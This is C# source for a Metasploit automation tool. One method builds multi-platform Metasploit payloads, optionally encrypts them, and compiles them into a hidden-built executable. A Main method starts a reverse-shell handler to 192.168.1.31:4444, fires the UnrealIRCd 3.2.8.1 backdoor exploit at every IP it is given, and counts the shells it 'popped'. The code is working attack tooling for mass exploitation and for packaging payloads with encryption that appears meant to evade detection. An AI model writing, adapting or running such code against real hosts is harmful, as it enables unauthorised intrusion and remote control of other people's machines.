void HandleClicked(object sender, EventArgs e) { string template = string.Empty; Assembly asm = Assembly.GetExecutingAssembly(); string rsrc = _encrypted.Active ? "MetasploitPayloadUtility.EncryptedTemplate.txt" : "MetasploitPayloadUtility.GeneralTemplate.txt"; using (StreamReader rdr = new StreamReader(asm.GetManifestResourceStream(rsrc))) template = rdr.ReadToEnd(); string winx64Payload = "payload = new byte[][] {"; string winx86Payload = winx64Payload; string linx86Payload = winx86Payload; string linx64Payload = linx86Payload; MessageDialog md; try { if (!_encrypted.Active) { foreach (var pair in _newPayloads) { pair.Value ["Format"] = "csharp"; var response = _manager.ExecuteModule("payload", pair.Key, pair.Value); if (response.Count == 6) { md = new MessageDialog(this, DialogFlags.DestroyWithParent, MessageType.Warning, ButtonsType.Close, "Generating payload failed.\n\n" + response["error_message"]); md.Run(); md.Destroy(); return; } if (pair.Key.StartsWith("linux/x86") || pair.Key.StartsWith("osx/x86")) { linx86Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ","); } else if (pair.Key.StartsWith("linux/x64") || pair.Key.StartsWith("osx/x64")) { linx64Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ","); } else if (pair.Key.StartsWith("windows/x64")) { winx64Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ","); } else /*windows x86*/ { winx86Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ","); } } winx64Payload += "};"; winx86Payload += "};"; linx64Payload += "};"; linx86Payload += "};"; //Console.WriteLine (winx64Payload); //Console.WriteLine (winx86Payload); //Console.WriteLine (linx64Payload); //Console.WriteLine (linx86Payload); } else { byte[] parity = new byte[4]; for (int i = 0; i < 4; i++) { parity [i] = Convert.ToByte(Convert.ToInt32(Math.Floor(26 * _random.NextDouble() + 65))); } foreach (var pair in _newPayloads) { pair.Value ["Format"] = "raw"; var response = _manager.ExecuteModule("payload", pair.Key, pair.Value); if (response.Count == 6) { md = new MessageDialog(this, DialogFlags.DestroyWithParent, MessageType.Warning, ButtonsType.Close, "Generating payload failed.\n\n" + response["error_message"]); md.Run(); md.Destroy(); return; } if (pair.Key.StartsWith("linux/x86") || pair.Key.StartsWith("osx/x86")) { byte[] b = response ["payload"] as byte[]; byte[] encb = new byte[b.Length + 4]; encb [0] = parity [0]; encb [1] = parity [1]; encb [2] = parity [2]; encb [3] = parity [3]; for (int i = 4; i < b.Length; i++) { encb [i] = b [i - 4]; } linx86Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString())); } else if (pair.Key.StartsWith("linux/x64") || pair.Key.StartsWith("osx/x64")) { byte[] b = response ["payload"] as byte[]; byte[] encb = new byte[b.Length + 4]; encb [0] = parity [0]; encb [1] = parity [1]; encb [2] = parity [2]; encb [3] = parity [3]; for (int i = 4; i < b.Length; i++) { encb [i] = b [i - 4]; } linx64Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString())); } else if (pair.Key.StartsWith("windows/x64")) { byte[] b = response ["payload"] as byte[]; byte[] encb = new byte[b.Length + 4]; encb [0] = parity [0]; encb [1] = parity [1]; encb [2] = parity [2]; encb [3] = parity [3]; for (int i = 4; i < b.Length; i++) { encb [i] = b [i - 4]; } winx64Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString())); } else /*windows x86*/ { byte[] b = response ["payload"] as byte[]; byte[] encb = new byte[b.Length + 4]; encb [0] = parity [0]; encb [1] = parity [1]; encb [2] = parity [2]; encb [3] = parity [3]; for (int i = 4; i < b.Length; i++) { encb [i] = b [i - 4]; } winx86Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString())); } } winx64Payload += "};"; winx86Payload += "};"; linx64Payload += "};"; linx86Payload += "};"; //Console.WriteLine (winx64Payload); //Console.WriteLine (winx86Payload); //Console.WriteLine (linx64Payload); //Console.WriteLine (linx86Payload); string par = GetByteArrayString(parity); template = template.Replace("{{parity}}", par.Remove(par.Length - 1)); } } catch { md = new MessageDialog(this, DialogFlags.DestroyWithParent, MessageType.Warning, ButtonsType.Close, "Generating payload failed.\n\nPlease ensure all required (*) options are present and valid.\n\nIf you are sure options are correct, please file a bug."); md.Run(); md.Destroy(); } template = template.Replace("{{lin64}}", linx64Payload); template = template.Replace("{{lin86}}", linx86Payload); template = template.Replace("{{win64}}", winx64Payload); template = template.Replace("{{win86}}", winx86Payload); Guid uid = Guid.NewGuid(); File.WriteAllText(System.IO.Path.GetTempPath() + uid.ToString(), template); System.Diagnostics.Process process = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; startInfo.FileName = "gmcs"; startInfo.Arguments = System.IO.Path.GetTempPath() + uid.ToString(); process.StartInfo = startInfo; process.Start(); process.WaitForExit(); md = new MessageDialog(this, DialogFlags.DestroyWithParent, MessageType.Warning, ButtonsType.Close, "Your binary is located at: " + System.IO.Path.GetTempPath() + uid.ToString() + ".exe"); md.Run(); md.Destroy(); }
public static void Main(string[] args) { using (MetasploitSession session = new MetasploitSession("user", "pass", "http://127.0.0.1:55553/api")) { if (string.IsNullOrEmpty(session.Token)) { throw new Exception("Login failed. Check credentials"); } using (MetasploitManager manager = new MetasploitManager(session)) { Dictionary <string, object> response = null; Dictionary <string, object> blah = new Dictionary <string, object> (); blah ["ExitOnSession"] = "false"; blah ["PAYLOAD"] = "cmd/unix/reverse"; blah ["LHOST"] = "192.168.1.31"; blah ["LPORT"] = "4444"; response = manager.ExecuteModule("exploit", "multi/handler", blah); object jobID = response ["job_id"]; foreach (string ip in args) { Dictionary <string, object> opts = new Dictionary <string, object> (); opts ["RHOST"] = ip; opts ["DisablePayloadHandler"] = "true"; opts ["LHOST"] = "192.168.1.31"; opts ["LPORT"] = "4444"; opts ["PAYLOAD"] = "cmd/unix/reverse"; response = manager.ExecuteModule("exploit", "unix/irc/unreal_ircd_3281_backdoor", opts); } response = manager.ListJobs(); List <object> vals = new List <object>(response.Values); while (vals.Contains((object)"Exploit: unix/irc/unreal_ircd_3281_backdoor")) { Console.WriteLine("Waiting"); System.Threading.Thread.Sleep(6000); response = manager.ListJobs(); vals = new List <object> (response.Values); } response = manager.StopJob(jobID.ToString()); response = manager.ListSessions(); Console.WriteLine("I popped " + response.Count + " shells. Awesome."); // foreach (var pair in response) { // string id = pair.Key; // Dictionary<string, object> dict = (Dictionary<string, object>)pair.Value; // if ((dict["type"] as string) == "shell") { // response = manager.WriteToSessionShell(id, "id\n"); // System.Threading.Thread.Sleep(6000); // response = manager.ReadSessionShell(id); // // Console.WriteLine(response["data"]); // // //manager.StopSession(id); // } // } Dictionary <string, object> bl = manager.GetModuleCompatibleSessions("multi/general/execute"); Console.WriteLine("fdsa"); } } }